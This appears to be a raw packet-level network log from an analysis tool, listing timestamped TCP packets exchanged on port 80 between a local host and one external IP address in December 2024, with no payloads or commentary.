                                                                                      Dec 26, 2024 12:05:14.597832918 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.597903967 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.598157883 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.598742008 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.598807096 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.598855972 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.599745035 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.599792957 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.599817991 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.599875927 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.600754976 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.600830078 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.600915909 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.600961924 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.601721048 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.601773977 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.601775885 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.601814985 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.602907896 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.602960110 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.602965117 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.603064060 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.603820086 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.603872061 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.603919983 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.603964090 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.604835987 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.604851007 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.604880095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.604923010 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.605875015 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.605930090 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.605959892 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.606012106 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.606962919 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.607007027 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.607036114 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.607079983 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.607974052 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.608001947 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.608031034 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.608047962 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.609100103 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.609147072 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.609149933 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.609186888 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.609957933 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.610070944 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.610127926 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.610968113 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.611013889 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.611073971 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.611133099 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.612341881 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.612387896 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.612405062 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.612517118 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.613269091 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.613315105 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.613331079 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.613380909 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.614084005 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.614137888 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.614305019 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.614547968 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.615145922 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.615262032 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.615293980 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.615326881 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.616105080 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.616148949 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.616198063 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.616256952 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.617204905 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.617340088 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.617391109 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.618201971 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.618263006 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.618283033 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.618297100 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.619168043 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.619206905 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.619271040 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.619406939 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.620249033 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.620291948 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.620311975 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.620353937 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.621205091 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.621257067 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.621296883 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.621342897 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.622193098 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.622240067 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.779151917 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.779190063 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.779280901 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.779661894 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.779809952 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.779865980 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.780586004 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.780636072 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.780730963 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.780778885 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.781646013 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.781696081 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.781761885 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.781809092 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.782602072 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.782653093 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.782675028 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.782692909 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.783574104 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.783701897 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.783750057 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.784614086 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.784656048 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.784723043 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.784766912 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.785638094 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.785689116 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.785763025 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.785801888 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.786642075 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.786691904 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.786777973 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.786837101 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.787709951 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.787733078 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.787760019 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.787789106 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.788753033 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.788800001 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.788853884 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.788897991 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.789716005 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.789767027 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.789830923 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.789875984 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.790776968 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.790826082 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.790859938 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.790904999 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.791902065 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.791948080 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.791989088 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.792036057 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.792804003 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.792850971 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.792928934 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.792973995 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.793844938 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.793888092 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.793947935 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.793993950 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.794867039 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.794919968 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.794934034 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.794979095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.795942068 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.795990944 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.796055079 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.796106100 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.797076941 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.797125101 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.797194958 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.797240973 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.798114061 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.798136950 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.798160076 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.798178911 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.799063921 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.799113989 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.799182892 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.799252033 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.799998999 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.800048113 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.800101042 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.800151110 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.801055908 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.801098108 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.801105022 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.801131010 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.802038908 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.802086115 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.802182913 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.802227020 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.803076982 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.803144932 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.803179026 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.803225994 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.804061890 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.804109097 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.804120064 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.804164886 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.805108070 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.805135965 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.805157900 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.805169106 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.806180954 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.806227922 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.806252956 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.806288958 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.807199001 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.807246923 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.807343960 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.807391882 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.808207035 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.808255911 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.808295012 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.808336020 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.809238911 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.809292078 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.809377909 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.809432030 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.810209036 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.810256958 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.810295105 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.810333967 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.811640024 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.811687946 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.811706066 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.811748981 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.812258959 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.812308073 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.812338114 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.812381029 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.813282967 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.813334942 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.813385010 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.813436031 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.814322948 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.814367056 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.814368010 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.814414978 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.815381050 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.815429926 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.815553904 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.815599918 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.816411972 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.816457033 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.816550016 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.816596031 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.817404985 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.817455053 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.817519903 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.817565918 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.818428993 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.818481922 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.818581104 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.818624973 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.819459915 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.819500923 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.819581032 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.819626093 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.820456028 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.820498943 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.820507050 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.820574045 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.821553946 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.821599007 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.821692944 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.821737051 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.822520018 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.822570086 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.822649956 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.822699070 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.823565006 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.823611975 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.823645115 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.823694944 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.824546099 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.824593067 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.824661016 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.824708939 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.825686932 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.825732946 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.825787067 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.825830936 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.826616049 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.826662064 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.826689005 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.826734066 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.827703953 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.827752113 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.827819109 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.827862024 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.828686953 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.828795910 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.828847885 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.830044985 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.830091953 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.830293894 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.830341101 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.830985069 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.831033945 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.831063032 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.831108093 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.831778049 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.831825972 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.831835032 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.831877947 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.832828045 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.832874060 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.989710093 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.989761114 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.989833117 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.990201950 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.990276098 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.990323067 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.991364002 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.991414070 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.991556883 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.991601944 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.992412090 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.992424965 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.992449045 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.992466927 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.993280888 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.993382931 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.993421078 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.994298935 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.994349003 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.994400024 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:14.994499922 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:14.995320082 CET8049708185.81.68.147192.168.2.5
